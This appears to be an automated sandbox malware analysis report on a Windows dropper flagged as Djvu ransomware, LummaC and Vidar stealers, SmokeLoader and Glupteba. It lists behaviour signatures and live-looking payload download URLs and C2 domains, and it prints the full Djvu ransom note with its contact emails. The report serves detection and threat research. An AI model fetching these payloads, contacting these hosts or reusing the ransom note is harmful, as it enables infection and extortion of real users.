Windows Analysis Report
6uVlPQSJ4e.exe

Overview

General Information

Sample name: 6uVlPQSJ4e.exe
renamed because original name is a hash value
Original sample name: b05a74505fa03339578dff002ba57c69.exe
Analysis ID: 1417167
MD5: b05a74505fa03339578dff002ba57c69
SHA1: b9851e84dbd2c8b2ecccb30452ddccb0496ef974
SHA256: e9839a31cca5038608b57f6e13e75f43aa845a2f892c917a77b3c4f0bcc35c7e
Tags: 32exetrojan
Infos:

Detection

LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Found ransom note / readme
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
UAC bypass detected (Fodhelper)
Yara detected AntiVM3
Yara detected Babuk Ransomware
Yara detected Clipboard Hijacker
Yara detected Djvu Ransomware
Yara detected Glupteba
Yara detected LummaC Stealer
Yara detected SmokeLoader
Yara detected Vidar
Yara detected Vidar stealer
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Found Tor onion address
Found many strings related to Crypto-Wallets (likely being stolen)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies existing user documents (likely ransomware behavior)
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses process hollowing technique
Sigma detected: Bypass UAC via Fodhelper.exe
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses cmd line tools excessively to alter registry or file data
Writes a notice file (html or txt) to demand a ransom
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Name Description Attribution Blogpost URLs Link
Babuk Babuk Ransomware is a sophisticated ransomware compiled for several platforms. Windows and ARM for Linux are the most used compiled versions, but ESX and a 32bit old PE executable were observed over time. as well It uses an Elliptic Curve Algorithm (Montgomery Algorithm) to build the encryption keys. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.babuk
Name Description Attribution Blogpost URLs Link
STOP, Djvu STOP Djvu Ransomware it is a ransomware which encrypts user data through AES-256 and adds one of the dozen available extensions as marker to the encrypted file's name. It is not used to encrypt the entire file but only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stop
Name Description Attribution Blogpost URLs Link
Glupteba Glupteba is a trojan horse malware that is one of the top ten malware variants of 2021. After infecting a system, the Glupteba malware can be used to deliver additional malware, steal user authentication information, and enroll the infected system in a cryptomining botnet. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba
Name Description Attribution Blogpost URLs Link
SmokeLoader The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

AV Detection

barindex
Source: 6uVlPQSJ4e.exe Avira: detected
Source: http://sdfjhuz.com/dl/build2.exeruneer Avira URL Cloud: Label: malware
Source: https://jennyilis.com/e0cbefcb1af40c7d4aff4aca26621a98.exe Avira URL Cloud: Label: malware
Source: http://sajdfue.com/test1/get.php Avira URL Cloud: Label: malware
Source: http://trade-inmyus.com/index.php Avira URL Cloud: Label: malware
Source: http://sdfjhuz.com/dl/build2.exe$run Avira URL Cloud: Label: malware
Source: http://sajdfue.com/test1/get.phpb Avira URL Cloud: Label: malware
Source: http://sajdfue.com/test1/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4 Avira URL Cloud: Label: malware
Source: http://sajdfue.com/files/1/build3.exe Avira URL Cloud: Label: malware
Source: http://sajdfue.com/files/1/build3.exe$run Avira URL Cloud: Label: malware
Source: http://sajdfue.com/test1/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=true Avira URL Cloud: Label: malware
Source: http://sajdfue.com/files/1/build3.exerun85 Avira URL Cloud: Label: malware
Source: problemregardybuiwo.fun Avira URL Cloud: Label: malware
Source: https://resergvearyinitiani.shop/api5 Avira URL Cloud: Label: malware
Source: https://resergvearyinitiani.shop/T Avira URL Cloud: Label: malware
Source: http://sdfjhuz.com/dl/build2.exe: Avira URL Cloud: Label: malware
Source: https://resergvearyinitiani.shop/. Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\build2[1].exe Avira: detection malicious, Label: HEUR/AGEN.1352954
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Avira: detection malicious, Label: HEUR/AGEN.1313019
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\build3[1].exe Avira: detection malicious, Label: TR/AD.MalwareCrypter.llbpm
Source: C:\Users\user\AppData\Local\Temp\71C9.exe Avira: detection malicious, Label: TR/Crypt.EPACK.Gen2
Source: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Djvu {"Download URLs": ["http://sdfjhuz.com/dl/build2.exe", "http://sajdfue.com/files/1/build3.exe"], "C2 url": "http://sajdfue.com/test1/get.php", "Ransom note file": "_README.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nDo not ask assistants from youtube and recovery data sites for help in recovering your data.\r\nThey can use your free decryption quota and scam you.\r\nOur contact is emails in this text document only.\r\nYou can get and look video overview decrypt tool:\r\nhttps://wetransfer.com/downloads/3ed7a617738550b0a00c5aa231c0752020240316170955/d71ce1\r\nPrice of private key and decrypt software is $999.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $499.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshingmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelpyou@airmail.cc\r\n\r\nYour personal ID:\r\n0857PsawqS", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E
Source: 00000006.00000002.2358331788.0000000000C80000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://trad-einmyus.com/index.php", "http://tradein-myus.com/index.php", "http://trade-inmyus.com/index.php"]}
Source: 00000029.00000002.3568020251.0000000000400000.00000040.00000400.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199658817715"], "Botnet": "5739ef2bbcd39fcd59c5746bfe4238c5", "Version": "8.6"}
Source: A0B.exe.5352.23.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["associationokeo.shop", "turkeyunlikelyofw.shop", "pooreveningfuseor.pw", "edurestunningcrackyow.fun", "detectordiscusser.shop", "problemregardybuiwo.fun", "lighterepisodeheighte.fun", "lighterepisodeheighte.fun", "technologyenterdo.shop", "resergvearyinitiani.shop"], "Build id": "GhJLkO--seevpalpadin"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\build2[1].exe ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\build3[1].exe ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Temp\A0B.exe ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build3.exe ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Roaming\gtdirat ReversingLabs: Detection: 31%
Source: 6uVlPQSJ4e.exe ReversingLabs: Detection: 31%
Source: Yara match File source: 44.3.71C9.exe.39e0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.71C9.exe.3190e67.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 44.2.71C9.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 44.2.71C9.exe.30f0e67.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.3.71C9.exe.3a80000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.71C9.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000002C.00000002.4539281116.0000000003533000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.3174084489.0000000003E22000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3174783125.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3185463938.00000000035D3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.3083456233.0000000003EC2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000002.4516603892.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 71C9.exe PID: 6944, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 71C9.exe PID: 3208, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\build3[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\71C9.exe Joe Sandbox ML: detected
Source: 6uVlPQSJ4e.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext, 12_2_0040E870
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_0040EA51 CryptDestroyHash,CryptReleaseContext, 12_2_0040EA51
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext, 12_2_0040EAA0
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_0040EC68 CryptDestroyHash,CryptReleaseContext, 12_2_0040EC68
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext, 12_2_00410FC0
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_00411178 CryptDestroyHash,CryptReleaseContext, 12_2_00411178
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext, 17_2_0040E870
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext, 17_2_0040EAA0
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext, 17_2_00410FC0
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_00411178 CryptDestroyHash,CryptReleaseContext, 17_2_00411178
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_0040EA51 CryptDestroyHash,CryptReleaseContext, 17_2_0040EA51
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_0040EC68 CryptDestroyHash,CryptReleaseContext, 17_2_0040EC68

Privilege Escalation

barindex
Source: C:\Users\user\AppData\Local\Temp\71C9.exe Registry value created: DelegateExecute
Source: C:\Users\user\AppData\Local\Temp\71C9.exe Registry value created: NULL "C:\Users\user\AppData\Local\Temp\71C9.exe"

Bitcoin Miner

barindex
Source: Yara match File source: 44.3.71C9.exe.39e0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.71C9.exe.3190e67.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 44.2.71C9.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 44.2.71C9.exe.30f0e67.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.3.71C9.exe.3a80000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.71C9.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000002C.00000002.4539281116.0000000003533000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.3174084489.0000000003E22000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3174783125.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3185463938.00000000035D3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.3083456233.0000000003EC2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000002.4516603892.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 71C9.exe PID: 6944, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 71C9.exe PID: 3208, type: MEMORYSTR

Compliance

barindex
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Unpacked PE file: 12.2.DB15.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Unpacked PE file: 17.2.DB15.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Unpacked PE file: 19.2.DB15.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Unpacked PE file: 22.2.DB15.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Unpacked PE file: 28.2.DB15.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\71C9.exe Unpacked PE file: 29.2.71C9.exe.400000.5.unpack
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe Unpacked PE file: 41.2.build2.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\71C9.exe Unpacked PE file: 44.2.71C9.exe.400000.5.unpack
Source: 6uVlPQSJ4e.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe File created: C:\Users\user\_README.txt Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe File created: C:\_README.txt
Source: C:\Users\user\AppData\Local\Temp\DB15.exe File created: C:\$WinREAgent\_README.txt
Source: C:\Users\user\AppData\Local\Temp\DB15.exe File created: C:\$WinREAgent\Scratch\_README.txt
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknown HTTPS traffic detected: 192.185.16.114:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.6:49724 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.6:49726 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.253.115.138:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.6:49729 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.6:49729 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.207.127:443 -> 192.168.2.6:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.6:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.6:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.156.20:443 -> 192.168.2.6:49733 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.6:49734 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.6:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.105.90.131:443 -> 192.168.2.6:49738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 78.46.229.36:443 -> 192.168.2.6:49741 version: TLS 1.2
Source: Binary string: mozglue.pdbP source: build2.exe, 00000029.00000002.3578472192.000000006C48D000.00000002.00000001.01000000.0000001B.sdmp
Source: Binary string: Loader.pdb source: 71C9.exe, 0000001D.00000002.3174783125.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.00000000035D3000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003EC2000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000002C.00000002.4539281116.0000000003533000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: YC:\kowad\hur_xez bejuwud_nucasa25 nima49\ler.pdb source: 6uVlPQSJ4e.exe, 00000000.00000000.2055147362.0000000000410000.00000002.00000001.01000000.00000003.sdmp, 6uVlPQSJ4e.exe, 00000000.00000002.2119831662.0000000000410000.00000002.00000001.01000000.00000003.sdmp, gtdirat, 00000006.00000000.2306948780.0000000000410000.00000002.00000001.01000000.00000005.sdmp, gtdirat, 00000006.00000002.2358003231.0000000000410000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: nss3.pdb@ source: build2.exe, 00000029.00000002.3579393951.000000006C64F000.00000002.00000001.01000000.0000001A.sdmp
Source: Binary string: EfiGuardDxe.pdb7 source: 71C9.exe, 0000001D.00000002.3181347032.0000000002D88000.00000040.00000020.00020000.00000000.sdmp
Source: Binary string: C:\kowad\hur_xez bejuwud_nucasa25 nima49\ler.pdb source: 6uVlPQSJ4e.exe, 00000000.00000000.2055147362.0000000000410000.00000002.00000001.01000000.00000003.sdmp, 6uVlPQSJ4e.exe, 00000000.00000002.2119831662.0000000000410000.00000002.00000001.01000000.00000003.sdmp, gtdirat, 00000006.00000000.2306948780.0000000000410000.00000002.00000001.01000000.00000005.sdmp, gtdirat, 00000006.00000002.2358003231.0000000000410000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: symsrv.pdb source: 71C9.exe, 0000001D.00000002.3185463938.0000000003A09000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000002.3174783125.0000000000C7A000.00000040.00000001.01000000.0000000B.sdmp
Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: !?C:\fub15\jekofesero\faduporixe_yaf.pdb source: DB15.exe, 0000000B.00000002.2819787929.0000000000410000.00000002.00000001.01000000.00000006.sdmp, DB15.exe, 0000000B.00000000.2817926575.0000000000410000.00000002.00000001.01000000.00000006.sdmp, DB15.exe, 0000000C.00000000.2819249973.0000000000410000.00000002.00000001.01000000.00000006.sdmp, DB15.exe, 00000010.00000002.2841208220.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 00000010.00000000.2836193602.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 00000011.00000000.2839475530.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 00000012.00000002.2842579793.0000000000410000.00000002.00000001.01000000.00000006.sdmp, DB15.exe, 00000012.00000000.2839477285.0000000000410000.00000002.00000001.01000000.00000006.sdmp, DB15.exe, 00000013.00000000.2840959577.0000000000410000.00000002.00000001.01000000.00000006.sdmp, DB15.exe, 00000015.00000000.2960769899.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 00000015.00000002.2966350391.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 00000016.00000000.2964684710.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 0000001B.00000002.3049973246.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 0000001B.00000000.3044970773.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 0000001C.00000000.3046708932.0000000000410000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: mozglue.pdb source: build2.exe, 00000029.00000002.3578472192.000000006C48D000.00000002.00000001.01000000.0000001B.sdmp
Source: Binary string: C:\bap\xipuvi-g.pdb source: 71C9.exe, 0000001D.00000000.3076477137.0000000000410000.00000002.00000001.01000000.0000000B.sdmp
